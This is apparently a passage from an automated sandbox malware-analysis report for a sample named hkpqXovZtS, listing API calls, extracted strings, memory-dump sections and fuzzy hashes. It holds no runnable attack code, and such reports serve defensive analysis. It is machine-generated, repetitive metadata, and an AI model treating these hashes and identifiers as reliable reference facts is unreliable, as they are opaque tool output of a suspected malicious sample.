                                                                                                                • Instruction Fuzzy Hash: E721F8B5950344A6CB20AB54DC42AFE77B8EF40328B20401FE481A7290EBBCADD1C3DD
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy_wcslen$FileNameOpen$_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2318761785-0
                                                                                                                • Opcode ID: d4d160a5a99151fc53f3776d17938c5c1abe38bd93845d617e3507f21d755f62
                                                                                                                • Instruction ID: 7ff7d73551e11c8291ab67cdb52b17aaa0b2af9189deb6198912616bcef33b7b
                                                                                                                • Opcode Fuzzy Hash: d4d160a5a99151fc53f3776d17938c5c1abe38bd93845d617e3507f21d755f62
                                                                                                                • Instruction Fuzzy Hash: DB31D571900659ABCB11EFA9DC46ACF7BB8DF44354F10042BF904B7241DB389999CBE9
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 1cdc5067381a7bd1af707b862421276f76a21733c0535646f00d30873fffd5b8
                                                                                                                • Instruction ID: cf89c72935c9b6de2e9a11cb675f2a5172e6f64d74dd08a61f0e1fe1ad5c90b1
                                                                                                                • Opcode Fuzzy Hash: 1cdc5067381a7bd1af707b862421276f76a21733c0535646f00d30873fffd5b8
                                                                                                                • Instruction Fuzzy Hash: B721A77A910208BFCB01EFE8C894DDEBBB9AF08340B4181A6A5169B525DB35DB458F84
                                                                                                                APIs
                                                                                                                • RtlDecodePointer.NTDLL(?), ref: 022B162C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecodePointer
                                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                • API String ID: 3527080286-3064271455
                                                                                                                • Opcode ID: 1cbb6359fac53526fea43d4624e3d7967483e9a318a70d15ccb5c825f90ed7da
                                                                                                                • Instruction ID: af1d5d08ea95af10b08e5d46dfdcbbc3a8b17e79f2ecb54a9f9c0102a0e8c4a7
                                                                                                                • Opcode Fuzzy Hash: 1cbb6359fac53526fea43d4624e3d7967483e9a318a70d15ccb5c825f90ed7da
                                                                                                                • Instruction Fuzzy Hash: 6251AA71A2060ACBDF128FE8E56C1EEBBB4FF05388F450085D885A7A6CCB748534DB50
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00423FB9
                                                                                                                  • Part of subcall function 0041D9AA: TlsGetValue.KERNEL32(00000000,?,0041DA23,00000000,00423F85,0044AB78,00000000,00000314,?,00420CD2,0044AB78,Microsoft Visual C++ Runtime Library,00012010), ref: 0041D9BC
                                                                                                                  • Part of subcall function 0041D9AA: TlsGetValue.KERNEL32(00000007,?,0041DA23,00000000,00423F85,0044AB78,00000000,00000314,?,00420CD2,0044AB78,Microsoft Visual C++ Runtime Library,00012010), ref: 0041D9D3
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00423FD6
                                                                                                                  • Part of subcall function 0041D9AA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041DA04
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00423FEB
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00424000
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00424018
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Value
                                                                                                                • String ID: GetProcessWindowStation$MessageBoxA$USER32.DLL
                                                                                                                • API String ID: 1216973216-2247880650
                                                                                                                • Opcode ID: 2a265f664f7c42708469a1e2f417818f182c4ada4f241b82a6a32059f33f07f6
                                                                                                                • Instruction ID: 93fbe99845333f5db7f92e93949936f57448bc0fb4e0f10d09b70ea8315728cb
                                                                                                                • Opcode Fuzzy Hash: 2a265f664f7c42708469a1e2f417818f182c4ada4f241b82a6a32059f33f07f6
                                                                                                                • Instruction Fuzzy Hash: B34187B1E00225A6DB10AFB6AC05A6F7AE8EF81754B50442FF944D3254DF7CD881C69E
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A2AE: _wcsrchr.LIBCMT ref: 0040A2C2
                                                                                                                • _wcslen.LIBCMT ref: 0040A41B
                                                                                                                • _wcscpy.LIBCMT ref: 0040A450
                                                                                                                  • Part of subcall function 00410850: _wcslen.LIBCMT ref: 00410856
                                                                                                                  • Part of subcall function 00410850: _wcsncat.LIBCMT ref: 00410870
                                                                                                                • _wcslen.LIBCMT ref: 0040A490
                                                                                                                • _wcscpy.LIBCMT ref: 0040A502
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$_wcscpy$_wcsncat_wcsrchr
                                                                                                                • String ID: .rar$exe$rar$sfx
                                                                                                                • API String ID: 1023950463-630704357
                                                                                                                • Opcode ID: 168b9255e32ce3a3b65e82a87f7de2f16222fbebbb3b242f1905199bff5d2360
                                                                                                                • Instruction ID: 20c2214daff69375ecb729738a606a90611832925fb8d322f336f880b4a91c57
                                                                                                                • Opcode Fuzzy Hash: 168b9255e32ce3a3b65e82a87f7de2f16222fbebbb3b242f1905199bff5d2360
                                                                                                                • Instruction Fuzzy Hash: 89312835140320A5C724AB259C89A7B7398DF44754F21483FF842BB1D2EBBC88E6D25F
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041DB57
                                                                                                                • GetProcAddress.KERNEL32(00419D04,DecodePointer), ref: 0041DB67
                                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0041DB96
                                                                                                                • ___addlocaleref.LIBCMT ref: 0041DBC8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$IncrementInterlocked___addlocaleref
                                                                                                                • String ID: yB$DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                • API String ID: 320354791-36624002
                                                                                                                • Opcode ID: f158d1c87b7404b582db598389b9a5af448d1a3a74bab96e753a02af75644d9c
                                                                                                                • Instruction ID: b59c708ac32c3afeb84f4e6cd8855df30e9afe7776d71f47958d32bd84706c8d
                                                                                                                • Opcode Fuzzy Hash: f158d1c87b7404b582db598389b9a5af448d1a3a74bab96e753a02af75644d9c
                                                                                                                • Instruction Fuzzy Hash: FD11A5B1A487019BD720AF36DC01B9ABBE4AF04314F50455FE4A997391CB78AA81CB5C
                                                                                                                APIs
                                                                                                                • GetConsoleOutputCP.KERNEL32(5B5E5FC0,00000000,?), ref: 022A9021
                                                                                                                • __fassign.LIBCMT ref: 022A9206
                                                                                                                • __fassign.LIBCMT ref: 022A9223
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 022A926B
                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 022A92AB
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 022A9353
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 1735259414-2496334608
                                                                                                                • Opcode ID: 26eb9c308c7c62252109c7aead1df882b61c0caf63e4ebe790a120fcf6691c02
                                                                                                                • Instruction ID: 7d0585bb493213fbda252d6e64be4e498f4568731e23cdafcf35e1b06d6db178
                                                                                                                • Opcode Fuzzy Hash: 26eb9c308c7c62252109c7aead1df882b61c0caf63e4ebe790a120fcf6691c02
                                                                                                                • Instruction Fuzzy Hash: D4C1BF75D102589FCF10CFE9C8949EDBBB5AF48308F2841AAE815FB645D7319946CF50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409E73: _wcslen.LIBCMT ref: 00409E79
                                                                                                                  • Part of subcall function 00409E73: _wcscat.LIBCMT ref: 00409E98
                                                                                                                • _swprintf.LIBCMT ref: 0040EBE9
                                                                                                                  • Part of subcall function 0040B8BD: __vswprintf_c_l.LIBCMT ref: 0040B8D0
                                                                                                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 0040EC0B
                                                                                                                • _wcschr.LIBCMT ref: 0040EC3E
                                                                                                                • _wcscpy.LIBCMT ref: 0040EC82
                                                                                                                • _wcscpy.LIBCMT ref: 0040ECAB
                                                                                                                • _wcscpy.LIBCMT ref: 0040ECBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$ItemText__vswprintf_c_l_swprintf_wcscat_wcschr_wcslen
                                                                                                                • String ID: %s%s%d
                                                                                                                • API String ID: 2709753399-1000756122
                                                                                                                • Opcode ID: 3c31340004b8bf789c4987741b75b5355be1984d5082fc00c233e2affe1969a9
                                                                                                                • Instruction ID: e65d78a6c3a695d06915e74f3048f0d8e8369ebe84acbf0f567f7489278a11bb
                                                                                                                • Opcode Fuzzy Hash: 3c31340004b8bf789c4987741b75b5355be1984d5082fc00c233e2affe1969a9
                                                                                                                • Instruction Fuzzy Hash: EC5184B280015D9ADB21DB61DC44FEE77B8FF04308F0444BBE609F7191E7799A988B59
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSelect$Delete
                                                                                                                • String ID: @L(tH.G
                                                                                                                • API String ID: 119191458-690434681
                                                                                                                • Opcode ID: b5068a9bc3bda6569274045b2a10aff9f09a18750b8383e27909a8e8d72d2b25
                                                                                                                • Instruction ID: abfd82eaafa14a910ec27d7b9ec10ad6157ed40cf37bddc85fb870bed2e29a72
                                                                                                                • Opcode Fuzzy Hash: b5068a9bc3bda6569274045b2a10aff9f09a18750b8383e27909a8e8d72d2b25
                                                                                                                • Instruction Fuzzy Hash: 4421A37290021CFBCF119FA6CC45CDEBFBAFB49350B10546AF91462121C7359A21EBA4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: api-ms-$ext-ms-$kL
                                                                                                                • API String ID: 0-1454199919
                                                                                                                • Opcode ID: 7038f207f03575411c0d6c5e5a3c19ffc687549f563f7fda9528c5dcb778d0b1
                                                                                                                • Instruction ID: 7a66139eb47f586873424de04b3fe21af535e4fa65ffeb31782cd660facb6588
                                                                                                                • Opcode Fuzzy Hash: 7038f207f03575411c0d6c5e5a3c19ffc687549f563f7fda9528c5dcb778d0b1
                                                                                                                • Instruction Fuzzy Hash: 15210071D71221E7EF228AECAC58B6A77699F00F64F150550EC16E7584E770DD10C5E3
                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 0040D614
                                                                                                                  • Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
                                                                                                                  • Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
                                                                                                                  • Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355
                                                                                                                • _wcslen.LIBCMT ref: 0040D654
                                                                                                                • _wcscat.LIBCMT ref: 0040D66B
                                                                                                                • _wcslen.LIBCMT ref: 0040D671
                                                                                                                • _wcscpy.LIBCMT ref: 0040D69F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$AllocateHeap_malloc_wcscat_wcscpy
                                                                                                                • String ID: lB$}
                                                                                                                • API String ID: 2020890722-3886410931
                                                                                                                • Opcode ID: 61bdf308878c9fcf69c6b2b0224747f1d0ad288e69c1be1bf6ea8e92dae5e1d9
                                                                                                                • Instruction ID: bd52086ed73c2d65d5c10d9766c04ca50ba83bbbb0247cd22e628ce0dbe0cb87
                                                                                                                • Opcode Fuzzy Hash: 61bdf308878c9fcf69c6b2b0224747f1d0ad288e69c1be1bf6ea8e92dae5e1d9
                                                                                                                • Instruction Fuzzy Hash: E011EB31D0071A59E725BAD0C885BEB73A8DF00354F50047BE648A22D2E7BD9D8CC69C
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F4,D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c,00000036,022B3318), ref: 022A1C92
                                                                                                                • GetFileType.KERNEL32(00000000), ref: 022A1CA4
                                                                                                                • swprintf.LIBCMT ref: 022A1CC5
                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000), ref: 022A1D02
                                                                                                                Strings
                                                                                                                • kL, xrefs: 022A1C7D
                                                                                                                • Assertion failed: %Ts, file %Ts, line %d, xrefs: 022A1CBA
                                                                                                                • D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c, xrefs: 022A1C8C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleFileHandleTypeWriteswprintf
                                                                                                                • String ID: Assertion failed: %Ts, file %Ts, line %d$D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c$kL
                                                                                                                • API String ID: 2943507729-378192037
                                                                                                                • Opcode ID: 2f8bde7bfe986f47d06a0e6f59bf52659c8c86e08d0f494af105ca06f6629c1e
                                                                                                                • Instruction ID: 368b6c031ba0aa28bb25e0da4c02474c7f067e3968c2f242873187c967ef6a68
                                                                                                                • Opcode Fuzzy Hash: 2f8bde7bfe986f47d06a0e6f59bf52659c8c86e08d0f494af105ca06f6629c1e
                                                                                                                • Instruction Fuzzy Hash: 4E115775900109ABCB20EFA9DC48AEF77BDDF44320F504988FE1AD7484DB30A9568BA4
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcschr$__vswprintf_c_l_swprintf_wcsncpy
                                                                                                                • String ID: %c:\$%s.%d.tmp
                                                                                                                • API String ID: 2474501127-1021493711
                                                                                                                • Opcode ID: 13023c835e085818cff9dbbafa42bb21a44b684dcc68a1ed31b204af2ebc45ec
                                                                                                                • Instruction ID: 6eb9db36f88ceb87230377d65e12d3b7c7bd282f19d30ce67c10a7d98d8e666a
                                                                                                                • Opcode Fuzzy Hash: 13023c835e085818cff9dbbafa42bb21a44b684dcc68a1ed31b204af2ebc45ec
                                                                                                                • Instruction Fuzzy Hash: 4A01C02361431179D620AA269C06D5B63FCEF85361B54883FF485E71C1EA38D8A4C2BE
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00000001,0042791C,00000001,?,00001006,00001004,?,?,?,?,0042443C,00000001,?,00000000,?,?), ref: 00424293
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00001006,00001004,?,?,?,?,0042443C,00000001,?,00000000), ref: 004242F8
                                                                                                                • _malloc.LIBCMT ref: 0042432D
                                                                                                                • _memset.LIBCMT ref: 0042434D
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,00000000,?,00000001,00000000,00000000,?,?,00000000), ref: 00424362
                                                                                                                • __freea.LIBCMT ref: 0042437A
                                                                                                                • ___convertcp.LIBCMT ref: 004243C5
                                                                                                                  • Part of subcall function 00424799: GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,0042443C,00000001,?,00000000,?,?,?), ref: 004247E4
                                                                                                                  • Part of subcall function 00424799: GetCPInfo.KERNEL32(?,00000001,?,0042443C,00000001,?), ref: 004247FD
                                                                                                                  • Part of subcall function 00424799: _strlen.LIBCMT ref: 0042481B
                                                                                                                  • Part of subcall function 00424799: _memset.LIBCMT ref: 00424893
                                                                                                                  • Part of subcall function 00424799: MultiByteToWideChar.KERNEL32(?,00000001,?,0042443C,?,00000000,?,?,?,?,?,?,?,0042443C,00000001,?), ref: 004248AA
                                                                                                                  • Part of subcall function 00424799: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,0042443C), ref: 004248C5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$Info_memset$ErrorLast___convertcp__freea_malloc_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2103348365-0
                                                                                                                • Opcode ID: 0c3878dd51481ebc2fabe7f109d7a724efcf0643c35a273e57e78dfd4a062cb4
                                                                                                                • Instruction ID: dd6d72a3f82dc0a27b31079b9578b86ef109fb9b0ddb421b3ca8fc5724d51598
                                                                                                                • Opcode Fuzzy Hash: 0c3878dd51481ebc2fabe7f109d7a724efcf0643c35a273e57e78dfd4a062cb4
                                                                                                                • Instruction Fuzzy Hash: A751907170012AEFDF10DFA5EC819AF3BA9EB88354B91042AFD10D7250D738CD618BA8
                                                                                                                APIs
                                                                                                                • _wcslen.LIBCMT ref: 00418D1A
                                                                                                                • _malloc.LIBCMT ref: 00418D24
                                                                                                                  • Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
                                                                                                                  • Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
                                                                                                                  • Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_malloc_wcslen
                                                                                                                • String ID: </p>$</style>$<br>$<style>
                                                                                                                • API String ID: 4208083856-1200123991
